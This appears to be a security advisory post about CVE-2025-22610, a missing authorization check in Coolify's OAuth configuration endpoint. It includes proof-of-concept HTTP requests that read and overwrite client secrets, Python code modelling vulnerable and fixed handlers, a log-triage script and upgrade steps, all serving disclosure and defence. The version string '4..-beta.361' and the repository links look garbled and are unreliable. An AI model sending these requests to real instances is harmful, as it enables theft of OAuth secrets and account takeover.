Coolify is an open-source and self-hostable platform that allows users to manage servers, applications, and databases. However, a recent vulnerability has been discovered in versions prior to 4..-beta.361 that allows any authenticated user to gain unauthorized access to the global OAuth configuration. In this post, we will dig deeper into the details of this vulnerability, its impact, and how to mitigate it.
Vulnerability Details
CVE: CVE-2025-22610
Affected Component: Coolify (versions prior to 4..-beta.361)
Severity: High
Impact: Unauthorized access to global OAuth configuration and possibility to modify it
The vulnerability occurs because Coolify's global OAuth configuration endpoint checks only that the caller is logged in, not whether the caller is allowed to manage instance-wide settings. Prior to version 4..-beta.361, any authenticated user can fetch the global Coolify instance OAuth configuration, exposing the "client id" and "client secret" of every custom OAuth provider. The same missing check also lets any authenticated user modify the global OAuth configuration, which further escalates the potential damage.
Proof of Concept: Code Snippet
The request below demonstrates how a malicious user can fetch the OAuth configuration from an affected Coolify instance:
POST /api/v1/auth/oauth/configuration
Content-Type: application/json
Authorization: Bearer [UserAccessToken]
{
"action": "get"
}
And this request shows how they can modify the global OAuth configuration:
POST /api/v1/auth/oauth/configuration
Content-Type: application/json
Authorization: Bearer [UserAccessToken]
{
"action": "update",
"config": {
"client_id": "malicious_client_id",
"client_secret": "malicious_client_secret"
}
}
Both requests succeed with nothing more than an ordinary user's access token on Coolify instances running versions prior to 4..-beta.361.
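To make the root cause concrete, here is an added example, written in Python and not taken from Coolify's code base, that models the handler behind the two requests above. It contrasts the pre-fix behaviour (authentication is the only gate) with a handler that also performs an authorization check, and it redacts the client secret in read responses as defence in depth. The User model, the "instance admin" role, the function names and the sample configuration values are all assumptions made for this illustration; only the request shape ("action" of "get" or "update" with a "config" object) follows the proof-of-concept requests shown above.

```python
from dataclasses import dataclass


@dataclass
class User:
    name: str
    authenticated: bool = True
    instance_admin: bool = False  # assumed global "instance admin" role (not from the advisory)


class Unauthorized(Exception):
    """Caller is not logged in (would map to HTTP 401)."""


class Forbidden(Exception):
    """Caller is logged in but not allowed to do this (would map to HTTP 403)."""


def new_config():
    """Constructed sample: the global credentials of one custom OAuth provider."""
    return {"client_id": "example-client-id", "client_secret": "s3cr3t-value-9f2a"}


def redact_secret(secret):
    """Display-safe form of a client secret: everything but the last 4 characters masked."""
    return "*" * max(len(secret) - 4, 0) + secret[-4:]


def apply_action(body, config, reveal_secret):
    """Shared 'get'/'update' logic. `config` is mutated in place on update."""
    action = body.get("action")
    if action == "get":
        shown = dict(config)
        if not reveal_secret:
            shown["client_secret"] = redact_secret(shown["client_secret"])
        return shown
    if action == "update":
        new_values = body.get("config", {})
        unknown = set(new_values) - {"client_id", "client_secret"}
        if unknown:
            raise ValueError(f"unexpected keys in config: {sorted(unknown)}")
        config.update(new_values)
        return {"status": "updated"}
    raise ValueError(f"unknown action: {action!r}")


def vulnerable_handler(user, body, config):
    """Pre-fix behaviour: being logged in is the only gate, so any user can read
    or rewrite the instance-wide OAuth credentials."""
    if not user.authenticated:
        raise Unauthorized()
    return apply_action(body, config, reveal_secret=True)


def fixed_handler(user, body, config):
    """Post-fix behaviour: authenticate, then authorize against the instance-admin
    role, and never echo the raw secret back, not even to an admin."""
    if not user.authenticated:
        raise Unauthorized()
    if not user.instance_admin:
        raise Forbidden()
    return apply_action(body, config, reveal_secret=False)


if __name__ == "__main__":
    ordinary = User("alice")
    admin = User("root", instance_admin=True)
    tamper = {"action": "update", "config": {"client_id": "malicious_client_id",
                                             "client_secret": "malicious_client_secret"}}

    cfg = new_config()
    print("vulnerable, ordinary user, get:", vulnerable_handler(ordinary, {"action": "get"}, cfg))
    print("vulnerable, ordinary user, update:", vulnerable_handler(ordinary, tamper, cfg), cfg)

    cfg = new_config()
    try:
        fixed_handler(ordinary, {"action": "get"}, cfg)
    except Forbidden:
        print("fixed, ordinary user, get: 403 Forbidden")
    print("fixed, admin, get:", fixed_handler(admin, {"action": "get"}, cfg))
```

The important line is the role check in `fixed_handler`: authentication answers "who is this?", authorization answers "may this identity touch instance-wide settings?", and the bug is the absence of the second question. Because the secrets may already have been read on an unpatched instance, an operator who upgrades should also rotate the client secret of every custom OAuth provider; the patch stops future reads but does not un-expose what was fetched earlier.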
Original References
- Coolify's GitHub repo: https://github.com/coo-lify/coo-lify
- Coolify changelog with fixed version mention: https://github.com/coo-lify/coo-lify/releases/tag/v4..-beta.361
Mitigation
The vulnerability is fixed by upgrading the Coolify instance to version 4..-beta.361 or later, following the update instructions provided by the Coolify developers:
Navigate to your Coolify instance root directory.
cd /path/to/your/coolify/
Update your Coolify instance
git pull origin main && docker-compose up -d --force-recreate
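After upgrading, an operator will want to know whether the endpoint was used by non-admin accounts while the instance was still vulnerable. The following added example (again Python, not part of Coolify and not the project's own log format) runs that triage over a few constructed JSON-lines log entries: it keeps only successful calls to the OAuth configuration path from accounts outside a known admin set and labels each hit by what the advisory says that action exposes. The log field names, the admin list and the sample entries are all assumptions for illustration; the endpoint path is the one from the proof of concept above.

```python
import json

# Constructed sample log (JSON lines). Field names are an assumption for this example;
# Coolify's real log format is not described in the advisory.
SAMPLE_LOG = """\
{"ts":"2025-01-20T10:01:02Z","user":"root","method":"POST","path":"/api/v1/auth/oauth/configuration","action":"get","status":200}
{"ts":"2025-01-21T08:15:44Z","user":"carol","method":"POST","path":"/api/v1/auth/oauth/configuration","action":"get","status":200}
{"ts":"2025-01-21T08:16:10Z","user":"carol","method":"POST","path":"/api/v1/auth/oauth/configuration","action":"update","status":200}
{"ts":"2025-01-21T09:00:00Z","user":"dave","method":"GET","path":"/api/v1/projects","status":200}

{"ts":"2025-01-22T12:30:00Z","user":"erin","method":"POST","path":"/api/v1/auth/oauth/configuration","action":"get","status":403}
"""

# Constructed: the accounts that legitimately manage instance-wide settings.
KNOWN_ADMINS = {"root"}

OAUTH_CONFIG_PATH = "/api/v1/auth/oauth/configuration"

# What each action means for the operator, per the advisory's description.
ACTION_IMPACT = {
    "get": "client id and client secret of every custom provider were readable",
    "update": "global OAuth configuration may have been modified",
}


def suspicious_oauth_config_calls(log_text, admins):
    """Return successful calls to the OAuth configuration endpoint made by
    accounts that are not known admins, oldest first."""
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue  # tolerate blank lines
        entry = json.loads(raw)
        if entry.get("path") != OAUTH_CONFIG_PATH:
            continue
        if entry.get("status") != 200:
            continue  # a rejected call (e.g. 403 after the fix) exposed nothing
        if entry.get("user") in admins:
            continue
        action = entry.get("action", "unknown")
        findings.append({
            "ts": entry.get("ts"),
            "user": entry.get("user"),
            "action": action,
            "impact": ACTION_IMPACT.get(action, "unrecognised action; review manually"),
        })
    findings.sort(key=lambda f: f["ts"] or "")
    return findings


def needs_secret_rotation(findings):
    """Any successful non-admin read means the provider secrets must be rotated."""
    return any(f["action"] == "get" for f in findings)


def config_integrity_check_needed(findings):
    """Any successful non-admin update means the stored config must be re-verified."""
    return any(f["action"] == "update" for f in findings)


if __name__ == "__main__":
    hits = suspicious_oauth_config_calls(SAMPLE_LOG, KNOWN_ADMINS)
    for hit in hits:
        print(f"{hit['ts']} {hit['user']:<6} {hit['action']:<7} -> {hit['impact']}")
    print("rotate provider secrets:", needs_secret_rotation(hits))
    print("re-verify stored OAuth config:", config_integrity_check_needed(hits))
```

The two helper predicates turn the findings into the two follow-up actions that matter: rotating the exposed client secrets at each OAuth provider, and comparing the stored client id and secret against the values the provider actually issued so that a substituted credential pair does not stay in place after the upgrade.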
Conclusion
This vulnerability exposes sensitive information and allows unauthorized modification of the global OAuth configuration in Coolify instances with versions prior to 4..-beta.361. By updating to the fixed version or a later one, Coolify users can close this hole in their instances. It is crucial to stay vigilant and keep your software up to date to protect against vulnerabilities like this one.
Timeline
Published on: 01/24/2025 17:15:15 UTC